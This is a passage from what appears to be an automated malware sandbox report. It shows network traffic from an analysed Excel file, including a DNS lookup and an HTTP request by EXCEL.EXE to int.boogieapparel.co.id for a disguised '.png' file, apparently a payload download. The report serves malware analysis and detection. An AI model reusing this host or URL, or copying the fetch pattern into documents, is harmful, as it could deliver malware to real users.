,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                                                                                                                                                      Network Behavior

                                                                                                                                                      Network Port Distribution

                                                                                                                                                      TCP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Nov 20, 2020 20:59:58.264079094 CET4971080192.168.2.3103.253.212.59
                                                                                                                                                      Nov 20, 2020 20:59:58.451435089 CET8049710103.253.212.59192.168.2.3
                                                                                                                                                      Nov 20, 2020 20:59:58.451553106 CET4971080192.168.2.3103.253.212.59
                                                                                                                                                      Nov 20, 2020 20:59:58.452203989 CET4971080192.168.2.3103.253.212.59
                                                                                                                                                      Nov 20, 2020 20:59:58.639242887 CET8049710103.253.212.59192.168.2.3
                                                                                                                                                      Nov 20, 2020 20:59:59.059113026 CET8049710103.253.212.59192.168.2.3
                                                                                                                                                      Nov 20, 2020 20:59:59.059325933 CET4971080192.168.2.3103.253.212.59
                                                                                                                                                      Nov 20, 2020 21:00:09.650489092 CET8049710103.253.212.59192.168.2.3
                                                                                                                                                      Nov 20, 2020 21:00:09.650568008 CET4971080192.168.2.3103.253.212.59
                                                                                                                                                      Nov 20, 2020 21:01:44.976155996 CET4971080192.168.2.3103.253.212.59
                                                                                                                                                      Nov 20, 2020 21:01:45.489631891 CET4971080192.168.2.3103.253.212.59
                                                                                                                                                      Nov 20, 2020 21:01:46.427391052 CET4971080192.168.2.3103.253.212.59
                                                                                                                                                      Nov 20, 2020 21:01:48.286830902 CET4971080192.168.2.3103.253.212.59
                                                                                                                                                      Nov 20, 2020 21:01:52.005786896 CET4971080192.168.2.3103.253.212.59
                                                                                                                                                      Nov 20, 2020 21:01:59.429954052 CET4971080192.168.2.3103.253.212.59

                                                                                                                                                      UDP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Nov 20, 2020 20:59:55.010256052 CET5836153192.168.2.38.8.8.8
                                                                                                                                                      Nov 20, 2020 20:59:55.077363014 CET53583618.8.8.8192.168.2.3
                                                                                                                                                      Nov 20, 2020 20:59:55.369225025 CET6349253192.168.2.38.8.8.8
                                                                                                                                                      Nov 20, 2020 20:59:55.406622887 CET53634928.8.8.8192.168.2.3
                                                                                                                                                      Nov 20, 2020 20:59:56.371375084 CET6349253192.168.2.38.8.8.8
                                                                                                                                                      Nov 20, 2020 20:59:56.409147024 CET53634928.8.8.8192.168.2.3
                                                                                                                                                      Nov 20, 2020 20:59:57.376400948 CET6349253192.168.2.38.8.8.8
                                                                                                                                                      Nov 20, 2020 20:59:57.414279938 CET53634928.8.8.8192.168.2.3
                                                                                                                                                      Nov 20, 2020 20:59:57.919801950 CET6083153192.168.2.38.8.8.8
                                                                                                                                                      Nov 20, 2020 20:59:58.262128115 CET53608318.8.8.8192.168.2.3
                                                                                                                                                      Nov 20, 2020 20:59:59.387667894 CET6349253192.168.2.38.8.8.8
                                                                                                                                                      Nov 20, 2020 20:59:59.423490047 CET53634928.8.8.8192.168.2.3
                                                                                                                                                      Nov 20, 2020 21:00:03.412751913 CET6349253192.168.2.38.8.8.8
                                                                                                                                                      Nov 20, 2020 21:00:03.440138102 CET53634928.8.8.8192.168.2.3
                                                                                                                                                      Nov 20, 2020 21:00:09.482413054 CET6010053192.168.2.38.8.8.8
                                                                                                                                                      Nov 20, 2020 21:00:09.509483099 CET53601008.8.8.8192.168.2.3
                                                                                                                                                      Nov 20, 2020 21:00:12.906260014 CET5319553192.168.2.38.8.8.8
                                                                                                                                                      Nov 20, 2020 21:00:12.933518887 CET53531958.8.8.8192.168.2.3
                                                                                                                                                      Nov 20, 2020 21:00:13.553683043 CET5014153192.168.2.38.8.8.8
                                                                                                                                                      Nov 20, 2020 21:00:13.580786943 CET53501418.8.8.8192.168.2.3
                                                                                                                                                      Nov 20, 2020 21:00:14.193125010 CET5302353192.168.2.38.8.8.8
                                                                                                                                                      Nov 20, 2020 21:00:14.220267057 CET53530238.8.8.8192.168.2.3
                                                                                                                                                      Nov 20, 2020 21:00:14.900636911 CET4956353192.168.2.38.8.8.8
                                                                                                                                                      Nov 20, 2020 21:00:14.927825928 CET53495638.8.8.8192.168.2.3
                                                                                                                                                      Nov 20, 2020 21:00:15.612893105 CET5135253192.168.2.38.8.8.8
                                                                                                                                                      Nov 20, 2020 21:00:15.648816109 CET53513528.8.8.8192.168.2.3
                                                                                                                                                      Nov 20, 2020 21:00:16.271934986 CET5934953192.168.2.38.8.8.8
                                                                                                                                                      Nov 20, 2020 21:00:16.299041986 CET53593498.8.8.8192.168.2.3
                                                                                                                                                      Nov 20, 2020 21:00:17.189205885 CET5708453192.168.2.38.8.8.8
                                                                                                                                                      Nov 20, 2020 21:00:17.227020979 CET53570848.8.8.8192.168.2.3
                                                                                                                                                      Nov 20, 2020 21:00:17.905767918 CET5882353192.168.2.38.8.8.8
                                                                                                                                                      Nov 20, 2020 21:00:17.932991982 CET53588238.8.8.8192.168.2.3
                                                                                                                                                      Nov 20, 2020 21:00:18.192270994 CET5756853192.168.2.38.8.8.8
                                                                                                                                                      Nov 20, 2020 21:00:18.236012936 CET53575688.8.8.8192.168.2.3
                                                                                                                                                      Nov 20, 2020 21:00:18.730539083 CET5054053192.168.2.38.8.8.8
                                                                                                                                                      Nov 20, 2020 21:00:18.757674932 CET53505408.8.8.8192.168.2.3
                                                                                                                                                      Nov 20, 2020 21:00:19.493113995 CET5436653192.168.2.38.8.8.8
                                                                                                                                                      Nov 20, 2020 21:00:19.528721094 CET53543668.8.8.8192.168.2.3
                                                                                                                                                      Nov 20, 2020 21:00:20.665709019 CET5303453192.168.2.38.8.8.8
                                                                                                                                                      Nov 20, 2020 21:00:20.692946911 CET53530348.8.8.8192.168.2.3
                                                                                                                                                      Nov 20, 2020 21:00:21.343628883 CET5776253192.168.2.38.8.8.8
                                                                                                                                                      Nov 20, 2020 21:00:21.370630980 CET53577628.8.8.8192.168.2.3
                                                                                                                                                      Nov 20, 2020 21:00:24.070585966 CET5543553192.168.2.38.8.8.8
                                                                                                                                                      Nov 20, 2020 21:00:24.123390913 CET53554358.8.8.8192.168.2.3
                                                                                                                                                      Nov 20, 2020 21:00:33.111078978 CET5071353192.168.2.38.8.8.8
                                                                                                                                                      Nov 20, 2020 21:00:33.138375044 CET53507138.8.8.8192.168.2.3
                                                                                                                                                      Nov 20, 2020 21:00:44.489981890 CET5613253192.168.2.38.8.8.8
                                                                                                                                                      Nov 20, 2020 21:00:44.517146111 CET53561328.8.8.8192.168.2.3
                                                                                                                                                      Nov 20, 2020 21:00:48.299545050 CET5898753192.168.2.38.8.8.8
                                                                                                                                                      Nov 20, 2020 21:00:48.336915016 CET53589878.8.8.8192.168.2.3
                                                                                                                                                      Nov 20, 2020 21:01:19.089247942 CET5657953192.168.2.38.8.8.8
                                                                                                                                                      Nov 20, 2020 21:01:19.116470098 CET53565798.8.8.8192.168.2.3
                                                                                                                                                      Nov 20, 2020 21:01:20.382612944 CET6063353192.168.2.38.8.8.8
                                                                                                                                                      Nov 20, 2020 21:01:20.426791906 CET53606338.8.8.8192.168.2.3

                                                                                                                                                      DNS Queries

                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                      Nov 20, 2020 20:59:57.919801950 CET192.168.2.38.8.8.80xb39dStandard query (0)int.boogieapparel.co.idA (IP address)IN (0x0001)

                                                                                                                                                      DNS Answers

                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                      Nov 20, 2020 20:59:58.262128115 CET8.8.8.8192.168.2.30xb39dNo error (0)int.boogieapparel.co.id103.253.212.59A (IP address)IN (0x0001)

                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                      • int.boogieapparel.co.id

                                                                                                                                                      HTTP Packets

                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      0192.168.2.349710103.253.212.5980C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                      Nov 20, 2020 20:59:58.452203989 CET123OUTGET /jvkuykqpn/4574557.png HTTP/1.1
                                                                                                                                                      Accept: */*
                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                      Host: int.boogieapparel.co.id
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Nov 20, 2020 20:59:59.059113026 CET123INHTTP/1.1 200 OK
                                                                                                                                                      X-Powered-By: PHP/7.3.6
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Date: Fri, 20 Nov 2020 19:59:58 GMT
                                                                                                                                                      Server: LiteSpeed
                                                                                                                                                      X-Powered-By: PleskLin
                                                                                                                                                      Connection: Keep-Alive


                                                                                                                                                      Code Manipulations

                                                                                                                                                      Statistics

                                                                                                                                                      CPU Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Memory Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                      System Behavior

                                                                                                                                                      General

                                                                                                                                                      Start time:20:59:53
                                                                                                                                                      Start date:20/11/2020
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                      Imagebase:0x1360000
                                                                                                                                                      File size:27110184 bytes
                                                                                                                                                      MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Disassembly

                                                                                                                                                      Reset < >